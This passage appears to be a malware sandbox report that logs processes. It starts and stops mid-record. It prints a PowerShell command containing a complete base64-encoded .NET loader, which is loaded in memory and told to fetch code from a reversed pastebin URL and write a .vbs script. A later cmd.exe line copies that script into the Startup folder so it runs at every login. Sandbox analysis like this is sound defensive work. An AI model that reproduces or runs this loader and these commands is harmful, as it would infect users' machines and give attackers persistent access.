ByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAACgCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMAbwBtAG0AZQBuAHQAcwAAAAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAAAAAAAqAAEAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAAAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAALgAwAC4AMAAAAEQAEgABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMwAuAGQAbABsAAAAJgABAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAAAAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAATAASAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBkAGwAbAAAACIAAQABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAwAAAAMPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=');powershell.exe -Command $uDFilC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2284"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$Fwieq = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAALaDsYAAAAAAAAAAOAAAiELAVAAAB4AAAAGAAAAAAAACj0AAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAALU8AABPAAAAAEAAAEgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAEPAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAEB0AAAAgAAAAHgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAEgDAAAAQAAAAAQAAAAgAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAJAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADpPAAAAAAAAEgAAAACAAUAWCMAAPQXAAADAAAAAAAAAEw7AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKBcAAAoqHgIoGAAACiqmcxkAAAqAAQAABHMaAAAKgAIAAARzGwAACoADAAAEcxwAAAqABAAABCoufgEAAARvHQAACioufgIAAARvHgAACioufgMAAARvHwAACioufgQAAARvIAAACirGfgUAAAQUKCEAAAosHnIBAABw0AUAAAIoIgAACm8jAAAKcyQAAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDAAABiglAAAKdAYAAAKABwAABCoeAigmAAAKKhp+BwAABCoaKA0AAAYqHgIoJwAACioAGzAHAFUBAAABAAARAygoAAAKLEYdjScAAAElFnIxAABwoiUXDgSiJRhygQAAcKIlGR0oKQAACqIlGnKJAABwoiUbBKIlHHKNAABwoigqAAAKFhYVKCsAAAomBSgoAAAKLBpymQAAcA4EcucAAHAoLAAAChYWFSgrAAAKJiAADAAAKC0AAApzLgAACiUoLwAACm8wAAAKJXLrAABwKDEAAApvMgAACgoGbzIAAAoLBygxAAAKCwdyLwEAcHI1AQBwbzMAAAoLcy4AAAolKC8AAApvMAAACiUCKDEAAApvMgAACgwIbzIAAAoNCSgxAAAKDXI5AQBwEwQRBHJ/AQBwKDQAAAoTBCg1AAAKByg2AAAKbzcAAApylwEAcG84AAAKcsEBAHBvOQAAChQYjRcAAAElFhEEcskBAHAoNAAACqIlFwkoNgAACqJvOgAACibeDyUoOwAAChMFKDwAAAreACoAAABBHAAAAAAAAAAAAABFAQAARQEAAA8AAAAiAAABNgIDKD0AAAooPgAACioeAig/AAAKKi7QCQAAAigiAAAKKh4CKEAAAAoqAAATMAEAFAAAAAIAABECjAUAABstCCgBAAArCisCAgoGKiID/hUFAAAbKh4CKCcAAAoqAAAAEzACACgAAAADAAARAntCAAAKb0MAAAoKBowIAAAbLRIoAgAAKwoCe0IAAAoGb0QAAAoGKkoCKCcAAAoCc0UAAAp9QgAACioAQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAzMTkAAAAABQBsAAAATAgAACN+AAC4CAAAFAkAACNTdHJpbmdzAAAAAMwRAADkAQAAI1VTALATAAAQAAAAI0dVSUQAAADAEwAANAQAACNCbG9iAAAAAAAAAAIAAAFXFaIJCQ8AAAD6ATMAFgAAAQAAADcAAAAKAAAACAAAABkAAAAJAAAARQAAAEAAAAADAAAABQAAAAkAAAAKAAAACAAAAAEAAAADAAAAAQAAAAIAAAADAAAAAgAAAAAA0AQBAAAAAAAGAH4DsQcGAOsDsQcGAFUC8gYPAB8IAAAGAJYCpwUGAGEDpwUGANIDpwUGAJ4DpwUGALcDpwUGAN0CpwUGAIICawcGAP4BawcGACkDpwUGAPgCPwQKACECgAYKAM4BugQKAGkCugQOAJsBQQcOALAGBQcGABED8gYOAK0CigcOAMUClgAGAIAI/QQOAJwGQQcOAEYDlgAGAGMB/QQOAAEAkAQKAAwCGgUGADgC8gYGAOMBsQcGAFwG0QcGANIFhgUKAKsBcQUGALkF/QQGABsB/QQGAPcIpwUKALYBcQUOAF4IigcGAHsE/QQGALII/QSjAEoGAAAOAJsFlgAOAD8BlgAKAGwGkQgKAEsBkQgKAKgIkQgGADYExggOAC4IlgAGADcF/QQGAL4I/QQGAMcFpwUGAJABpwUOAIEAigcGAGoIsQcGANsG/QQAAAAASQAAAAAAAQABAAAAAABjBeIISQABAAEAAAAAAK4G4ghNAAEAAgAAARAAhwjiCF0AAQADAAABAADzB+IHXQAFAAgAAAEQAEMI4giFAAcACwAAAQAAAAniCF0ACAAOAAEAAAArADIAXQAIAA8ABQEAADMHAABdAAgAEQAFAQAAEAAAAF0ACAAYADEAEwZfATEA6gVnATEA/gVvATEALAZ3AREABAV/AREAgAGDAREA7wCIASEA0ggwAVAgAAAAAAYY5QYGAAEAWCAAAAAABhjlBgYAAQBgIAAAAAARGOsG+wABAIogAAAAABMIoQaMAQEAliAAAAAAEwhTBZEBAQCiIAAAAAATCJgGlgEBAK4gAAAAABMIIwebAQEAuiAAAAAAEwhYBqABAQDsIAAAAAATCGgBpQEBAPMgAAAAABMIdAGrAQEA+yAAAAAAERjrBvsAAgARIQAAAAAGGOUGBgACABkhAAAAABYInAiyAQIAICEAAAAAEwg2CLIBAgAnIQAAAAAGGOUGBgACADAhAAAAABYAwwW3AQIAsCIAAAAAxgJXCAQBBwC+IgAAAADGAggBCQEIAMYiAAAAAIMAYAHAAQgA0iIAAAAAxgJ5BA0BCADcIgAAAAARAG4AxQEIAPwiAAAAAAEAWgDNAQkABSMAAAAABhjlBgYACgAQIwAAAAADCN8ASgAKAEQjAAAAAAYY5QYGAAoAAAABACYEAAABANwIAAACAOQFAAADACwEAAAEAN4FAAAFAFQAAAABAOIFAAABAP8AAAABAP8ACQDlBgEAEQDlBgYAGQDlBgoAKQDlBhAAMQDlBhAAOQDlBhAAQQDlBhAASQDlBhAAUQDlBhAAWQDlBhUAYQDlBhAAaQDlBhAAcQDlBhAAeQDlBhoAiQDlBiAAoQDlBgYAqQDlBgYAsQDlBgYAyQDlBiYA4QDlBhAA6QDlBgYA8QDlBgYAkQDlBgYAmQDlBgYADADlBgYAFADlBgYAHADlBgYAJADlBgYADADfAEoAFADfAEoAHADfAEoAJADfAEoAuQBOCE8A0QAtAVUA0QDzCF0A+QDlBmMAKQGxAGsACQHlBgYAuQDlBgYAMQEQBX8AQQGCBIQAOQF5CIsAUQHiBJEAOQF5CJsAYQHoBKIAcQHlBgYAeQFAAKkAcQEyBK8AgQHDAbYAcQFqBLsAOQHIAMAAOQF5CMYAiQFBBcwAkQFZBNIAiQGsANgAIQFgAeAA0QC+AOYAoQEUAe0AqQHLBvQAqQG5BvsAsQEdBP8AuQBXCAQBuQAIAQkBuQB5BA0BuQHQABkBNADSCDABPAAJBEoAPAATBEcBPADlBgYAKQCjANsDLgALAP4BLgATAAcCLgAbACYCLgAjAC8CLgArAC8CLgAzAC8CLgA7AC8CLgBDAC8CLgBLAC8CLgBTAC8CLgBbADUCLgBjAF8CLgBrAGwCQACDALYCQAB7ALsCQwBzAMQCQwB7ALsCSQCjAOwDYwBzAMQCYwB7ALsCaQCjAAAEgACDALYCgwCLALYCgwCTALYCgwBzAMQCiQCjAA0EoACDALYCowCLALYCowBzAN0CowCrALYCowCzALYCowCTALYCqQB7ACYCwACDALYCwwCzALYCwwBzAB8DwwB7ACYCyQB7ACYC4ACDALYC4wCLALYC4wCTALYC4wCrALYC4wCzALYCCQGjACEEIwF7ALsCIwGbAHkDQwF7ALsCQwFTAC8CIAJ7ALsCIAKDALYCQAJ7ALsCQAKDALYCYAJ7ALsCYAKDALYCgAJ7ALsCgAKDALYCoAKDALYCwAKDALYC4AKDALYC4AJ7ALsCAAODALYCIAODALYCIAN7ALsCdAARASQBBAABAAUABQAGAAcABwAIAAoACQAAALAG1QEAAGUF2gEAAJwG3wEAADUH5AEAAFwG6QEAAIgB7gEAAKAI9AEAAEUI9AEAAOMA+QECAAQAAwACAAUABQACAAYABwACAAcACQACAAgACwACAAkADQABAAoADQACAA0ADwACAA4AEQACABgAEwAuADUAPABDABYBKQE4AT8BBIAAAAEAAAAAAAAAAAAAAAAAMgAAAAQAAAAAAAAAAAAAAE0BjQAAAAAABAAAAAAAAAAAAAAATQH9BAAAAAAKAAAAAAAAAAAAAABWAZYAAAAAAAAAAAABAAAA/QcAAAkABAAKAAQAAAAQABQAUgAAABAAKwBSAAAAAAAtAFIAgwAfAYMAQgEAAAAAAENvbnRleHRWYWx1ZWAxAFRocmVhZFNhZmVPYmplY3RQcm92aWRlcmAxAENsYXNzMQBDbGFzc0xpYnJhcnkzAGdldF9VVEY4ADxNb2R1bGU+AFQAREZXb1kARGlzcG9zZV9fSW5zdGFuY2VfXwBDcmVhdGVfX0luc3RhbmNlX18AUHJvamVjdERhdGEAbXNjb3JsaWIATWljcm9zb2Z0LlZpc3VhbEJhc2ljAExvYWQAU3luY2hyb25pemVkAEdldE1ldGhvZABSZXBsYWNlAENyZWF0ZUluc3RhbmNlAGdldF9HZXRJbnN0YW5jZQBkZWZhdWx0SW5zdGFuY2UAaW5zdGFuY2UAR2V0SGFzaENvZGUASW52b2tlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAEFwcFdpblN0eWxlAFNlY3VyaXR5UHJvdG9jb2xUeXBlAEdldFR5cGUAZ2V0X0N1bHR1cmUAc2V0X0N1bHR1cmUAcmVzb3VyY2VDdWx0dXJlAE1ldGhvZEJhc2UAQXBwbGljYXRpb25CYXNlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAFN0clJldmVyc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBIZWxwS2V5d29yZEF0dHJpYnV0ZQBHZW5lcmF0ZWRDb2RlQXR0cmlidXRlAERlYnVnZ2VyTm9uVXNlckNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBEZWJ1Z2dlckhpZGRlbkF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAGdldF9WYWx1ZQBzZXRfVmFsdWUAR2V0T2JqZWN0VmFsdWUASnNLdmUAc2V0X0VuY29kaW5nAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcARnJvbUJhc2U2NFN0cmluZwBEb3dubG9hZFN0cmluZwBUb1N0cmluZwBHZXRGb2xkZXJQYXRoAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABDbGFzc0xpYnJhcnkzLmRsbABTaGVsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AcmVzb3VyY2VNYW4AVG9Cb29sZWFuAFN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24AQXBwRG9tYWluAGdldF9DdXJyZW50RG9tYWluAGdldF9BcHBsaWNhdGlvbgBNeUFwcGxpY2F0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAEludGVyYWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBSdW4ATWV0aG9kSW5mbwBDdWx0dXJlSW5mbwBLdGlwbwBUQURjcgBtX0FwcE9iamVjdFByb3ZpZGVyAG1fVXNlck9iamVjdFByb3ZpZGVyAG1fQ29tcHV0ZXJPYmplY3RQcm92aWRlcgBtX015V2ViU2VydmljZXNPYmplY3RQcm92aWRlcgBTcGVjaWFsRm9sZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXIATXlDb21wdXRlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLk15LlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLlJlc291cmNlcy5yZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAU3RyaW5ncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZWZlcmVuY2VFcXVhbHMAQ29udmVyc2lvbnMAUnVudGltZUhlbHBlcnMAQ29uY2F0AE9iamVjdABNeVByb2plY3QAU3lzdGVtLk5ldABnZXRfRGVmYXVsdABXZWJDbGllbnQARW52aXJvbm1lbnQAQ29udmVydABTeXN0ZW0uVGV4dABtX0NvbnRleHQAaVFNQnUAQ2xhc3NMaWJyYXJ5My5NeQBnZXRfQXNzZW1ibHkATXlTZXR0aW5nc1Byb3BlcnR5AAAAL0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBSAGUAcwBvAHUAcgBjAGUAcwAAT2MAbQBkAC4AZQB4AGUAIAAvAGMAIABwAGkAbgBnACAAMQAyADcALgAwAC4AMAAuADEAIAAtAG4AIAA1ACAAJgAgAGMAbwBwAHkAIAAiAAEHIgAgACIAAANcAAALLgB2AGIAcwAiAABNYwBtAGQALgBlAHgAZQAgAC8AYwAgAHAAaQBuAGcAIAAxADIANwAuADAALgAwAC4AMQAgAC0AbgAgADcAIAAmACAAZABlAGwAIAAiAAEDIgAAQ1AAQQBiADUAZgB0ADcAMgAvAHcAYQByAC8AbQBvAGMALgBuAGkAYgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoAAAFAyYDJgEDQQAARUMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsAABdcAHYANAAuADAALgAzADAAMwAxADkAAClDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4AQwBsAGEAcwBzADEAAAdSAHUAbgAAF1wAUgBlAGcAQQBzAG0ALgBlAHgAZQAAAAAAzI9aL6rCbEyiG4fNrFFp4AAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBSACAQ4OBSABARFBByAEAQ4ODg4GFRIoARIMBhUSKAESCAYVEigBEmEGFRIoARIkBCAAEwAFAAICHBwHAAESaRGAjQUgABKAkQcgAgEOEoCRCAABEoCVEoCVCgcGDg4ODg4SgIkEAAECDgYAAQ4RgKUFAAEOHQ4JAAQIDhGArQIIBgADDg4ODgYAAQERgLUFAAASgL0GIAEBEoC9BAABDg4EIAEODgUgAg4ODgUAAg4ODgUAABKAxQUAAR0FDgcgARKAkR0FBSABEmkOBiABEoDNDgYgAhwcHRwGAAEBEoCJAwAAAQQAARwcBCABAhwDIAAIAyAADgQHAR4AAh4ABRABAB4ABAoBHgAEBwETAAYVEigBEwAHBhUSbQETAAYVEm0BEwACEwAECgETAAUgAQETAAi3elxWGTTgiQiwP19/EdUKOgcGFRIoARIMBwYVEigBEggHBhUSKAESYQcGFRIoARIkAwYSfQQGEoCBAwYSGAQAABIMBAAAEggEAAASYQQAABIkBAAAEn0FAAASgIEGAAEBEoCBBAAAEhgIAAUBDg4ODg4EIAASaQcQAQEeAB4ABzABAQEQHgAECAASDAQIABIIBAgAEmEECAASJAQIABJ9BQgAEoCBBAgAEhgEKAATAAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAFAQAAAAApAQAkRTMxRjJDRDYtMEIzQi00M0RELUI2NzAtNzEwOUYwQzcwMzNDAAAMAQAHMS4wLjAuMAAASQEAGi5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC41AQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZRIuTkVUIEZyYW1ld29yayA0LjUEAQAAAAgBAAEAAAAAABgBAApNeVRlbXBsYXRlCDExLjAuMC4wAABBAQAzU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyCDE2LjAuMC4wAABZAQBLTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5FZGl0b3JzLlNldHRpbmdzRGVzaWduZXIuU2V0dGluZ3NTaW5nbGVGaWxlR2VuZXJhdG9yCDE2LjIuMC4wAABhAQA0U3lzdGVtLldlYi5TZXJ2aWNlcy5Qcm90b2NvbHMuU29hcEh0dHBDbGllbnRQcm90b2NvbBJDcmVhdGVfX0luc3RhbmNlX18TRGlzcG9zZV9fSW5zdGFuY2VfXwAAABABAAtNeS5Db21wdXRlcgAAEwEADk15LkFwcGxpY2F0aW9uAAAMAQAHTXkuVXNlcgAAEwEADk15LldlYlNlcnZpY2VzAAAQAQALTXkuU2V0dGluZ3MAAAAAtAAAAM7K774BAAAAkQAAAGxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlUmVhZGVyLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkjU3lzdGVtLlJlc291cmNlcy5SdW50aW1lUmVzb3VyY2VTZXQCAAAAAAAAAAAAAABQQURQQURQtAAAAAAAAABEiyueAAAAAAIAAAB5AAAAPDwAADweAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAUlNEU0y66M9q/RZPhVvqU+tFgs0BAAAAQzpcVXNlcnNccGpvYW9cRGVza3RvcFxVcENyeVxNZXRvZG8gREZcQ2xhc3NMaWJyYXJ5M1xDbGFzc0xpYnJhcnkzXG9ialxSZWxlYXNlXENsYXNzTGlicmFyeTMucGRiAN08AAAAAAAAAAAAAPc8AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADpPAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAA7AIAAAAAAAAAAAAA7AI0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBEwCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAACgCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMAbwBtAG0AZQBuAHQAcwAAAAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAAAAAAAqAAEAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAAAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAALgAwAC4AMAAAAEQAEgABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMwAuAGQAbABsAAAAJgABAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAAAAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAATAASAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBkAGwAbAAAACIAAQABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAwAAAAMPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=';$BEisA = 'C:\Users\admin\AppData\Local\Temp\bFvBy.vbs';[Byte[]] $xDJoA = [System.Convert]::FromBase64String( $Fwieq );[System.AppDomain]::CurrentDomain.Load( $xDJoA ).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('TXMF9tBT/war/moc.nibetsap//:sptth', 'True', 'FKZVX', 'True', $BEisA ))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3244cmd.exe /c ping 127.0.0.1 -n 5 & copy "C:\Users\admin\AppData\Local\Temp\bFvBy.vbs" "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FKZVX.vbs"C:\Windows\system32\cmd.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
